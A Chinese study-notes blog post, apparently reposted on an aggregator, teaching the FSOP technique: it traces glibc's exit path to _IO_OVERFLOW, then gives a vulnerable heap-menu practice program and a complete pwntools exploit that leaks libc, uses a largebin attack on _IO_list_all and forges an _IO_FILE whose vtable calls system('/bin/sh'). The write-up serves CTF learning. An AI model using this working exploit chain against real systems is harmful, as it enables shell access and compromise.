【我的 PWN 学习手札】IO_FILE 之 FSOP

news2025/1/10 11:13:08

FSOP:File Stream Oriented Programming

通过劫持 _IO_list_all 指向伪造的 _IO_FILE_plus,进而调用fake IO_FILE 结构体对象中被伪造的vtable指向的恶意函数。

目录

前言

一、glibc-exit函数浅析

二、FSOP

三、Largebin attack + FSOP

(一)Leak libc

(二)Largebin attack

(三)FSOP 

(四)调试追踪调用

(五)EXP


前言

我们将着重关注vtable中的_IO_file_overflow函数指针。

当函数exit时,程序执行_IO_flush_all_lockp 函数。该函数会刷新 _IO_list_all 链表中所有项的文件流,相当于对每个 FILE 调用fflush ,也对应着会调用 _IO_FILE_plus.vtable 中的_IO_overflow。

参考宝藏博主:linux IO_FILE 利用_io list all结构体-CSDN博客 


一、glibc-exit函数浅析

一般FSOP可以通过exit来触发布置好的fake IO,我们来粗略过一遍流程

// exit.c
void exit(int status)
{
  __run_exit_handlers(status, &__exit_funcs, true);
}
libc_hidden_def(exit)

/* Call all functions registered with `atexit' and `on_exit',
   in the reverse of the order in which they were registered
   perform stdio cleanup, and terminate program execution with STATUS.  */
void
    attribute_hidden
    __run_exit_handlers(int status, struct exit_function_list **listp,
                        bool run_list_atexit)
{
  /* First, call the TLS destructors.  */
#ifndef SHARED
  if (&__call_tls_dtors != NULL)
#endif
    __call_tls_dtors();

  /* We do it this way to handle recursive calls to exit () made by
     the functions registered with `atexit' and `on_exit'. We call
     everyone on the list and use the status value in the last
     exit (). */
  while (*listp != NULL)
  {
    struct exit_function_list *cur = *listp;

    while (cur->idx > 0)
    {
      const struct exit_function *const f =
          &cur->fns[--cur->idx];
      switch (f->flavor)
      {
        void (*atfct)(void);
        void (*onfct)(int status, void *arg);
        void (*cxafct)(void *arg, int status);

      case ef_free:
      case ef_us:
        break;
      case ef_on:
        onfct = f->func.on.fn;
#ifdef PTR_DEMANGLE
        PTR_DEMANGLE(onfct);
#endif
        onfct(status, f->func.on.arg);
        break;
      case ef_at:
        atfct = f->func.at;
#ifdef PTR_DEMANGLE
        PTR_DEMANGLE(atfct);
#endif
        atfct();
        break;
      case ef_cxa:
        cxafct = f->func.cxa.fn;
#ifdef PTR_DEMANGLE
        PTR_DEMANGLE(cxafct);
#endif
        cxafct(f->func.cxa.arg, status);
        break;
      }
    }

    *listp = cur->next;
    if (*listp != NULL)
      /* Don't free the last element in the chain, this is the statically
         allocate element.  */
      free(cur);
  }

  if (run_list_atexit)
    RUN_HOOK(__libc_atexit, ());

  _exit(status);
}

exit实际调用了__run_exit_handlers函数。它的作用是在程序退出时调用所有通过 atexit 和 on_exit 注册的函数,并执行标准 I/O 清理,最终终止程序执行。

对于函数参数中的&__exit_funcs,可以继续追踪定位到其实现:

// cxa_atexit.c

/* Register a function to be called by exit or when a shared library
   is unloaded.  This function is only called from code generated by
   the C++ compiler.  */
int __cxa_atexit(void (*func)(void *), void *arg, void *d)
{
  return __internal_atexit(func, arg, d, &__exit_funcs);
}
libc_hidden_def(__cxa_atexit)

    /* We change global data, so we need locking.  */
    __libc_lock_define_initialized(static, lock)

        static struct exit_function_list initial;
struct exit_function_list *__exit_funcs = &initial;

对于“执行标准 I/O 清理”操作我们更为关心,chat得知是下述函数实现:

  if (run_list_atexit)
    RUN_HOOK(__libc_atexit, ());

 经过全局搜索可追溯到:

// genops.c
#ifdef text_set_element
text_set_element(__libc_atexit, _IO_cleanup);
#endif

此处已经看到,执行了IO清理的操作,继续追溯:

int
_IO_cleanup (void)
{
  /* We do *not* want locking.  Some threads might use streams but
     that is their problem, we flush them underneath them.  */
  int result = _IO_flush_all_lockp (0);

  /* We currently don't have a reliable mechanism for making sure that
     C++ static destructors are executed in the correct order.
     So it is possible that other static destructors might want to
     write to cout - and they're supposed to be able to do so.

     The following will make the standard streambufs be unbuffered,
     which forces any output from late destructors to be written out. */
  _IO_unbuffer_all ();

  return result;
}


int
_IO_flush_all_lockp (int do_lock)
{
  int result = 0;
  struct _IO_FILE *fp;
  int last_stamp;

#ifdef _IO_MTSAFE_IO
  __libc_cleanup_region_start (do_lock, flush_cleanup, NULL);
  if (do_lock)
    _IO_lock_lock (list_all_lock);
#endif

  last_stamp = _IO_list_all_stamp;
  fp = (_IO_FILE *) _IO_list_all;
  while (fp != NULL)
    {
      run_fp = fp;
      if (do_lock)
	_IO_flockfile (fp);

      if (((fp->_mode <= 0 && fp->_IO_write_ptr > fp->_IO_write_base)
#if defined _LIBC || defined _GLIBCPP_USE_WCHAR_T
	   || (_IO_vtable_offset (fp) == 0
	       && fp->_mode > 0 && (fp->_wide_data->_IO_write_ptr
				    > fp->_wide_data->_IO_write_base))
#endif
	   )
	  && _IO_OVERFLOW (fp, EOF) == EOF)
	result = EOF;

      if (do_lock)
	_IO_funlockfile (fp);
      run_fp = NULL;

      if (last_stamp != _IO_list_all_stamp)
	{
	  /* Something was added to the list.  Start all over again.  */
	  fp = (_IO_FILE *) _IO_list_all;
	  last_stamp = _IO_list_all_stamp;
	}
      else
	fp = fp->_chain;
    }

#ifdef _IO_MTSAFE_IO
  if (do_lock)
    _IO_lock_unlock (list_all_lock);
  __libc_cleanup_region_end (0);
#endif

  return result;
}

至此看到,对于_IO_list_all上的IO_FILE链,都执行_IO_OVERFLOW的操作。 

二、FSOP

劫持 _IO_list_all 的方式一般有两种:

  1. 修改 IO_FILE 结构体,为了不影响 IO 建议修改 _IO_2_1_stderr 结构体。
  2. 利用例如 large bin attack 的攻击方法将 _IO_list_all 覆盖成一个 chunk 地址,然后在该 chunk 上伪造 IO_FILE 结构体。 

        在劫持 _IO_2_1_stderr 时除了修改 vtable 指针指向伪造 vtable 外,要想调用 _IO_2_1_stderr 还需要修改 以满足以下条件:

fp->_mode _IO_write_ptr > fp->_IO_write_base

        因此不妨将 vtable 伪造在 _IO_2_1_stderr + 0x10 处使 _IO_overflow , _IO_2_1_stderr 的 fp->_IO_write_ptr 恰好对应于 vtable 的 _IO_overflow 。然后将fp->_IO_write_ptr 写入 system 函数地址。由于_IO_overflow 传入的参数为_IO_2_1_stderr 结构体,因此将结构体其实位置处写入 /bin/sh 字符串。 

                                                                                                                  ——by _sky123_

这里通过模板题,利用largebin attack来实现FSOP 

三、Largebin attack + FSOP

#include<stdlib.h>
#include <stdio.h>
#include <unistd.h>

char *chunk_list[0x100];

void menu() {
    puts("1. add chunk");
    puts("2. delete chunk");
    puts("3. edit chunk");
    puts("4. show chunk");
    puts("5. exit");
    puts("choice:");
}

int get_num() {
    char buf[0x10];
    read(0, buf, sizeof(buf));
    return atoi(buf);
}

void add_chunk() {
    puts("index:");
    int index = get_num();
    puts("size:");
    int size = get_num();
    chunk_list[index] = malloc(size);
}

void delete_chunk() {
    puts("index:");
    int index = get_num();
    free(chunk_list[index]);
}

void edit_chunk() {
    puts("index:");
    int index = get_num();
    puts("length:");
    int length = get_num();
    puts("content:");
    read(0, chunk_list[index], length);
}

void show_chunk() {
    puts("index:");
    int index = get_num();
    puts(chunk_list[index]);
}

int main() {
    setbuf(stdin, NULL);
    setbuf(stdout, NULL);
    setbuf(stderr, NULL);

    while (1) {
        menu();
        switch (get_num()) {
            case 1:
                add_chunk();
                break;
            case 2:
                delete_chunk();
                break;
            case 3:
                edit_chunk();
                break;
            case 4:
                show_chunk();
                break;
            case 5:
                exit(0);
            default:
                puts("invalid choice.");
        }
    }
}

(一)Leak libc

同时为了准备largebin attack,申请largebin范围大小的chunk

# leak libc
add(0,0x10)
add(0,0x418)
add(1,0x18)
add(2,0x428)
add(3,0x10)
delete(0)
delete(2)

show(0)
io.recvline()
libc.address=u64(io.recv(6).ljust(8,b'\x00'))-0x39bb78
success(hex(libc.address))
show(2)
io.recvline()
heap_base=u64(io.recv(6).ljust(8,b'\x00')) & ~0xfff
success(hex(heap_base))

(二)Largebin attack

# Largebin attack
add(0,0x418)
add(10,0x500)   
edit(2,p64(0)*3+p64(libc.sym['_IO_list_all']-0x20))     
delete(0)
add(10,0x500)

确实写了一个堆地址,但是为了能够布置数据,我们希望能将堆申请出来。为此我们不通过申请大chunk来触发largebin attack,而是申请一个小chunk,释放unsortedbin chunk到largebin中触发,又从largebin中取出chunk,到unsortedbin。至此largebin里只剩下目标chunk,我们再恢复一下相关指针,就可以将该chunk malloc出来。

修改上述exp片段代码

# Largebin attack
add(0,0x418)
add(10,0x500)
edit(2,p64(0)*3+p64(libc.sym['_IO_list_all']-0x20))
delete(0)
add(10,0x10)

可以看到unsortedbin里有一个chunk,largebin生下了目标chunk,接下来恢复指针

# fd、bk指向libc,fd_nextsize、bk_nextsize指向自己
edit(2,p64(libc.address+0x39bf68)*2+p64(heap_base+0x460)*2)

接下来申请出目标chunk

add(0,0x428)

(三)FSOP 

可见我们可控的区域实际上偏移了0x10,为此我们可以通过物理临近的前一个chunk复用prev_size字段来修改。

IO_FILE有模板,这里给出(来自这个大佬的博客) 

fake_file = b""
fake_file += b"/bin/sh\x00"  # _flags, an magic number
fake_file += p64(0)  # _IO_read_ptr
fake_file += p64(0)  # _IO_read_end
fake_file += p64(0)  # _IO_read_base
fake_file += p64(0)  # _IO_write_base
fake_file += p64(libc.sym['system'])  # _IO_write_ptr
fake_file += p64(0)  # _IO_write_end
fake_file += p64(0)  # _IO_buf_base;
fake_file += p64(0)  # _IO_buf_end should usually be (_IO_buf_base + 1)
fake_file += p64(0) * 4  # from _IO_save_base to _markers
fake_file += p64(libc.sym['_IO_2_1_stdout_'])  # the FILE chain ptr
fake_file += p32(2)  # _fileno for stderr is 2
fake_file += p32(0)  # _flags2, usually 0
fake_file += p64(0xFFFFFFFFFFFFFFFF)  # _old_offset, -1
fake_file += p16(0)  # _cur_column
fake_file += b"\x00"  # _vtable_offset
fake_file += b"\n"  # _shortbuf[1]
fake_file += p32(0)  # padding
fake_file += p64(libc.sym['_IO_2_1_stdout_'] + 0x1ea0)  # _IO_stdfile_1_lock
fake_file += p64(0xFFFFFFFFFFFFFFFF)  # _offset, -1
fake_file += p64(0)  # _codecvt, usually 0
fake_file += p64(libc.sym['_IO_2_1_stdout_'] - 0x160)  # _IO_wide_data_1
fake_file += p64(0) * 3  # from _freeres_list to __pad5
fake_file += p32(0xFFFFFFFF)  # _mode, usually -1
fake_file += b"\x00" * 19  # _unused2
fake_file = fake_file.ljust(0xD8, b'\x00')  # adjust to vtable
fake_file += p64(libc.sym['_IO_2_1_stderr_'] + 0x10)  # fake vtable

由于缺了0x10可控,这里需要薛微调整一下:

fake_file = b""
# fake_file += b"/bin/sh\x00"  # _flags, an magic number
# fake_file += p64(0)  # _IO_read_ptr
fake_file += p64(0)  # _IO_read_end
fake_file += p64(0)  # _IO_read_base
fake_file += p64(0)  # _IO_write_base
fake_file += p64(libc.sym['system'])  # _IO_write_ptr
fake_file += p64(0)  # _IO_write_end
fake_file += p64(0)  # _IO_buf_base;
fake_file += p64(0)  # _IO_buf_end should usually be (_IO_buf_base + 1)
fake_file += p64(0) * 4  # from _IO_save_base to _markers
fake_file += p64(libc.sym['_IO_2_1_stdout_'])  # the FILE chain ptr
fake_file += p32(2)  # _fileno for stderr is 2
fake_file += p32(0)  # _flags2, usually 0
fake_file += p64(0xFFFFFFFFFFFFFFFF)  # _old_offset, -1
fake_file += p16(0)  # _cur_column
fake_file += b"\x00"  # _vtable_offset
fake_file += b"\n"  # _shortbuf[1]
fake_file += p32(0)  # padding
fake_file += p64(libc.sym['_IO_2_1_stdout_'] + 0x1ea0)  # _IO_stdfile_1_lock
fake_file += p64(0xFFFFFFFFFFFFFFFF)  # _offset, -1
fake_file += p64(0)  # _codecvt, usually 0
fake_file += p64(libc.sym['_IO_2_1_stdout_'] - 0x160)  # _IO_wide_data_1
fake_file += p64(0) * 3  # from _freeres_list to __pad5
fake_file += p32(0xFFFFFFFF)  # _mode, usually -1
fake_file += b"\x00" * 19  # _unused2
fake_file = fake_file.ljust(0xD8-0x10, b'\x00')  # adjust to vtable
# fake_file += p64(libc.sym['_IO_2_1_stderr_'] + 0x10)  # fake vtable
fake_file += p64(heap_base+0x460 + 0x10)  # fake vtable
edit(0,fake_file)

然后就:

pwndbg> p *_IO_list_all
$4 = {
  file = {
    _flags = 0,
    _IO_read_ptr = 0x431 <error: Cannot access memory at address 0x431>,
    _IO_read_end = 0x0,
    _IO_read_base = 0x0,
    _IO_write_base = 0x0,
    _IO_write_ptr = 0x72d08ec3f560 <__libc_system> "H\205\377t\v\351\206\372\377\377f\017\037D",
    _IO_write_end = 0x0,
    _IO_buf_base = 0x0,
    _IO_buf_end = 0x0,
    _IO_save_base = 0x0,
    _IO_backup_base = 0x0,
    _IO_save_end = 0x0,
    _markers = 0x0,
    _chain = 0x72d08ef9c620 <_IO_2_1_stdout_>,
    _fileno = 2,
    _flags2 = 0,
    _old_offset = -1,
    _cur_column = 0,
    _vtable_offset = 0 '\000',
    _shortbuf = "\n",
    _lock = 0x72d08ef9e4c0 <prof_info+160>,
    _offset = -1,
    _codecvt = 0x0,
    _wide_data = 0x72d08ef9c4c0 <_nl_global_locale+160>,
    _freeres_list = 0x0,
    _freeres_buf = 0x0,
    __pad5 = 0,
    _mode = -1,
    _unused2 = '\000' <repeats 19 times>
  },
  vtable = 0x5e7f135df470
}
pwndbg> p *_IO_list_all.vtable 
$5 = {
  __dummy = 0,
  __dummy2 = 0,
  __finish = 0x0,
  __overflow = 0x72d08ec3f560 <__libc_system>,
  __underflow = 0x0,
  __uflow = 0x0,
  __pbackfail = 0x0,
  __xsputn = 0x0,
  __xsgetn = 0x0,
  __seekoff = 0x0,
  __seekpos = 0x0,
  __setbuf = 0x72d08ef9c620 <_IO_2_1_stdout_>,
  __sync = 0x2,
  __doallocate = 0xffffffffffffffff,
  __read = 0xa000000,
  __write = 0x72d08ef9e4c0 <prof_info+160>,
  __seek = 0xffffffffffffffff,
  __close = 0x0,
  __stat = 0x72d08ef9c4c0 <_nl_global_locale+160>,
  __showmanyc = 0x0,
  __imbue = 0x0
}

然后我们通过chunk_list[1]来布置"/bin/sh\x00"

edit(1,p64(0)*2+b'/bin/sh\x00')

(四)调试追踪调用

exit -> __run_exit_handlers -> _IO_cleanup -> _IO_flush_all_lockp -> fileop.vtable.overflow

fileop已经被我们劫持,也在该结构体头布置了”/bin/sh\x00"参数,因此执行system("/bin/sh\x00")

(五)EXP 

from pwn import *

elf=ELF("./pwn")
libc=ELF("./libc.so.6")
context.arch=elf.arch
context.log_level='debug'
context.os=elf.os
def add(index, size):
    io.sendafter(b"choice:", b"1")
    io.sendafter(b"index:", str(index).encode())
    io.sendafter(b"size:", str(size).encode())

def delete(index):
    io.sendafter(b"choice:", b"2")
    io.sendafter(b"index:", str(index).encode())

def edit(index, content):
    io.sendafter(b"choice:", b"3")
    io.sendafter(b"index:", str(index).encode())
    io.sendafter(b"length:", str(len(content)).encode())
    io.sendafter(b"content:", content)

def show(index):
    io.sendafter(b"choice:", b"4")
    io.sendafter(b"index:", str(index).encode())

io=process("./pwn")


# leak libc
add(0,0x10)
add(0,0x418)
add(1,0x18)
add(2,0x428)
add(3,0x10)
delete(0)
delete(2)

show(0)
io.recvline()
libc.address=u64(io.recv(6).ljust(8,b'\x00'))-0x39bb78
success(hex(libc.address))
show(2)
io.recvline()
heap_base=u64(io.recv(6).ljust(8,b'\x00')) & ~0xfff
success(hex(heap_base))

# Largebin attack
add(0,0x418)
add(10,0x500)
edit(2,p64(0)*3+p64(libc.sym['_IO_list_all']-0x20))  # 0x39bf68
delete(0)
add(10,0x10)
edit(2,p64(libc.address+0x39bf68)*2+p64(heap_base+0x460)*2)
add(0,0x428)

fake_file = b""
# fake_file += b"/bin/sh\x00"  # _flags, an magic number
# fake_file += p64(0)  # _IO_read_ptr
fake_file += p64(0)  # _IO_read_end
fake_file += p64(0)  # _IO_read_base
fake_file += p64(0)  # _IO_write_base
fake_file += p64(libc.sym['system'])  # _IO_write_ptr
fake_file += p64(0)  # _IO_write_end
fake_file += p64(0)  # _IO_buf_base;
fake_file += p64(0)  # _IO_buf_end should usually be (_IO_buf_base + 1)
fake_file += p64(0) * 4  # from _IO_save_base to _markers
fake_file += p64(libc.sym['_IO_2_1_stdout_'])  # the FILE chain ptr
fake_file += p32(2)  # _fileno for stderr is 2
fake_file += p32(0)  # _flags2, usually 0
fake_file += p64(0xFFFFFFFFFFFFFFFF)  # _old_offset, -1
fake_file += p16(0)  # _cur_column
fake_file += b"\x00"  # _vtable_offset
fake_file += b"\n"  # _shortbuf[1]
fake_file += p32(0)  # padding
fake_file += p64(libc.sym['_IO_2_1_stdout_'] + 0x1ea0)  # _IO_stdfile_1_lock
fake_file += p64(0xFFFFFFFFFFFFFFFF)  # _offset, -1
fake_file += p64(0)  # _codecvt, usually 0
fake_file += p64(libc.sym['_IO_2_1_stdout_'] - 0x160)  # _IO_wide_data_1
fake_file += p64(0) * 3  # from _freeres_list to __pad5
fake_file += p32(0xFFFFFFFF)  # _mode, usually -1
fake_file += b"\x00" * 19  # _unused2
fake_file = fake_file.ljust(0xD8-0x10, b'\x00')  # adjust to vtable
# fake_file += p64(libc.sym['_IO_2_1_stderr_'] + 0x10)  # fake vtable
fake_file += p64(heap_base+0x460 + 0x10)  # fake vtable
edit(0,fake_file)
edit(1,p64(0)*2+b'/bin/sh\x00')

gdb.attach(io,'b exit\nc')

io.interactive()

 

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2274302.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

ChatGPT入门之文本情绪识别:先了解LSTM如何处理文字序列

文章目录 0. 首先聊聊什么是RNN1. 理解LSTM&#xff0c;从数据如何喂给 LSTM开始2. LSTM每个门是如何处理序列数据的&#xff1f;2.1 遗忘门&#xff08;Forget Gate&#xff09;&#xff1a;该忘掉哪些信息&#xff1f;2.2 输入门&#xff08;Input Gate&#xff09;&#xff…

springboot和vue配置https请求

项目场景&#xff1a; 代码发布到线上使用https请求需要配置ssl证书&#xff0c;前后端都需要修改。 问题描述 如图&#xff0c;我们在调用接口时报如下错误&#xff0c;这就是未配置ssl但是用https请求产生的问题。 解决方案&#xff1a; 前端&#xff1a;在vite.config.js文…

软件工程期末整理(二)

快速原型开发模型是&#xff08;适用于客户需求难以清楚定义、规模较小的系统&#xff09;。(编写系统实施计划)不是系统设计阶段的主要活动 解释&#xff1a;系统实施计划”更侧重于后续的实施与部署阶段&#xff0c;属于项目管理层面的内容 协作性不属于构件的特性在类图中…

filebeat、kafka

elk的架构 es数据库&#xff1a;非关系型数据库&#xff0c;json格式 logstash&#xff1a;收集日志 kibana&#xff1a;图形化的工具 ↓ 以上三种结合起来即为日志收集系统 filebeat 作用&#xff1a;filebeat是一款轻量级的日志收集工具&#xff0c;不依赖java环境&…

vue3使用vue3-video-play播放m3u8视频

1.安装vue3-video-play npm install vue3-video-play --save2.在组件中使用 import vue3-video-play/dist/style.css; import VideoPlay from vue3-video-play;// 视频配置项 const options reactive({src: https://test-streams.mux.dev/x36xhzz/x36xhzz.m3u8, //视频源mute…

项目代码第8讲:Socket和OPC UA客户端通信;数据库的表格内容谁填的?(OPC Client和Web);在Program.cs中单独开启一个线程

一、Socket:用于和OPC UA客户端通信 1、Socket和OPC UA的定义 1>Socket:只是一个API,提供了一个使用 TCP(以及其他协议)的方式,用于在同一台计算机上的进程之间或不同计算机之间的进程通信 一个API Socket 是一种应用程序编程接口(API),它提供了一系列函数…

离线录制激光雷达数据进行建图

目前有一个2D激光雷达&#xff0c;自己控制小车运行一段时间&#xff0c;离线获取到激光雷达数据后运行如下代码进行离线建图。 roslaunch cartographer_ros demo_revo_lds.launch bag_filename:/home/firefly/AutoCar/data/rplidar_s2/2025-01-08-02-08-33.bag实际效果如下 d…

hisi mipi yuv422数据异常问题记录解决

问题解决&#xff0c;海思原厂提供支持后解决方式&#xff0c;适用于dv500和928系列&#xff1a; YUV422输入时&#xff0c;mask[1]使用0x00FFC000得配置。 问题现象就是mask[1]配置的0xFF0000时&#xff0c;YUV值收到后UV的会向下做一个4对齐的操作&#xff0c;导致色度UV数据…

《跟我学Spring Boot开发》系列文章索引❤(2025.01.09更新)

章节文章名备注第1节Spring Boot&#xff08;1&#xff09;基于Eclipse搭建Spring Boot开发环境环境搭建第2节Spring Boot&#xff08;2&#xff09;解决Maven下载依赖缓慢的问题给火车头提提速第3节Spring Boot&#xff08;3&#xff09;教你手工搭建Spring Boot项目纯手工玩法…

VS2022 安装和配置 vcpkg

vs2022使用vcpkg最全版本_vs2022 vcpkg-CSDN博客 Visual Studio 2022 安装和配置 vcpkg_vs2022 vcpkg-CSDN博客 GitHub - microsoft/vcpkg: C Library Manager for Windows, Linux, and MacOS vcpkg 文档 | Microsoft Learn 没有详细教程写出来&#xff0c;先大概看看&#x…

深度学习与计算机视觉 (博士)

文章目录 零、计算机视觉概述一、深度学习相关概念1.学习率η2.batchsize和epoch3.端到端(End-to-End)、序列到序列(Seq-to-Seq)4.消融实验5.学习方式6.监督学习的方式(1)有监督学习(2)强监督学习(3)弱监督学习(4)半监督学习(5)自监督学习(6)无监督学习(7)总结&#xff1a;不同…

5G学习笔记之PNI-NPN

目录 1. 概述 2. CAG 2.1 CAG ID 2.2 CAG信息配置 3. 网络选择/网络重选&#xff0c;小区选择/小区重选 4. 接入和拥塞控制 1. 概述 PNI-NPN&#xff0c;Public Network Integrated NPN&#xff0c;公共网络集成的非公共网络&#xff0c;依赖于PLMN网络&#xff0c;使用 CAG&am…

学习threejs,导入babylon格式的模型

&#x1f468;‍⚕️ 主页&#xff1a; gis分享者 &#x1f468;‍⚕️ 感谢各位大佬 点赞&#x1f44d; 收藏⭐ 留言&#x1f4dd; 加关注✅! &#x1f468;‍⚕️ 收录于专栏&#xff1a;threejs gis工程师 文章目录 一、&#x1f340;前言1.1 ☘️THREE.BabylonLoader babyl…

计算机网络——网络层—IP数据报与分片

一、IP 数据报的格式 • 一个 IP 数据报由首部和数据两部分组成。 • 首部的前一部分是固定长度&#xff0c;共 20 字节&#xff0c;是所有 IP 数据报必须具有的。 • 在首部的固定部分的后面是一些可选字段&#xff0c;其长度是可变的。 IP 数据报首部的固定部分中的各字段 版…

2025新年源码免费送

2025很开门很开门的源码免费传递。不需要馒头就能获取4套大开门源码。 听泉偷宝&#xff0c;又进来偷我源码啦&#x1f44a;&#x1f44a;&#x1f44a;。欢迎偷源码 &#x1f525;&#x1f525;&#x1f525; 获取免费源码以及更多源码&#xff0c;可以私信联系我 我们常常…

React快速上手到项目实战总篇

React核心价值与前置知识 时刻保持对知识的渴望 家人们 开学!!! 核心价值 组件化&#xff08;易开发易维护&#xff09; 数据驱动视图 &#xff1a;定义好数据和ui的显示规则 即UIf(state) 只关注业务数据修改&#xff0c;不在操作DOM 增加开发效率 使用vite创建Recat项目 …

采用标准化的方式开展设计-研发中运用设计模式

概述 实现规范化、标准化的引导式设计&#xff0c;以业务需求为输入&#xff0c;识别业务特点&#xff0c;并通过引导式设计&#xff0c;找到最适合的设计模式、具体方案&#xff0c;汇总成为应用的设计&#xff0c;拉齐各应用的设计一的致性。 采用标准化的方式开展设计…

Web无障碍

文章目录 &#x1f7e2;Web Accessibility-Web无障碍&#x1f7e2;一、Web Accessibility-Web1. web无障碍设计2. demo3.使用相关相关开源无障碍工具条(调用可能会根据网络有点慢) 如有其他更好方案&#xff0c;可以私信我哦✒️总结 &#x1f7e2;Web Accessibility-Web无障碍…

计算机网络 (26)互联网的路由选择协议

一、路由选择协议的基本概念 路由选择协议是计算机网络中用于确定数据包在网络中传输路径的一种协议。它帮助路由器构建和维护路由表&#xff0c;以便根据目的地址将数据包转发到正确的下一跳路由器。路由选择协议分为静态路由选择协议和动态路由选择协议两大类。 二、静态路由…

江科大STM32入门——UART通信笔记总结

wx&#xff1a;嵌入式工程师成长日记 1、简介 简单双向串口通信有两根通信线(发送端TX和接收端RX)TX与RX要交叉连接当只需单向的数据传输时&#xff0c;可以只接一根通信线当电平标准不一致时&#xff0c;需要加电平转换芯片 传输模式&#xff1a;全双工&#xff1b;时钟&…